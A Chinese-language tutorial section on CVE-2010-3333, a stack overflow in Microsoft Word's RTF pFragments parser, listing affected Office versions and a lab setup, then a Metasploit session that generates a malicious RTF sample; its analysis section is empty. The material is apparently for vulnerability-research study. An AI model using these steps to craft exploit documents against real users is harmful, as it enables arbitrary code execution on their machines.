7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞

下载文件

漏洞描述

cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 “pFragments” 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。

漏洞复现

推荐使用的环境 备注
操作系统 Windows XP SP3 体系结构:32 位
调试器 OllyDbg 版本号:吾爱专版
反汇编器 IDA Pro 版本号:7.0
漏洞软件 MS Office 版本号:2003 SP3

我们利用 Metasploit 来生成拒绝服务攻击样本:

  1. msf > search cve-2010-3333
  2. Name Disclosure Date Rank Description
  3. ---- --------------- ---- -----------
  4. exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
  5. msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
  6. msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > show info
  7. msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set target 6
  8. target => 6
  9. msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set filename cve20103333.rtf
  10. filename => cve20103333.rtf
  11. msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit
  12. [*] Creating 'cve20103333.rtf' file ...
  13. [+] cve20103333.rtf stored at /home/firmy/.msf4/local/cve20103333.rtf

漏洞分析

参考资料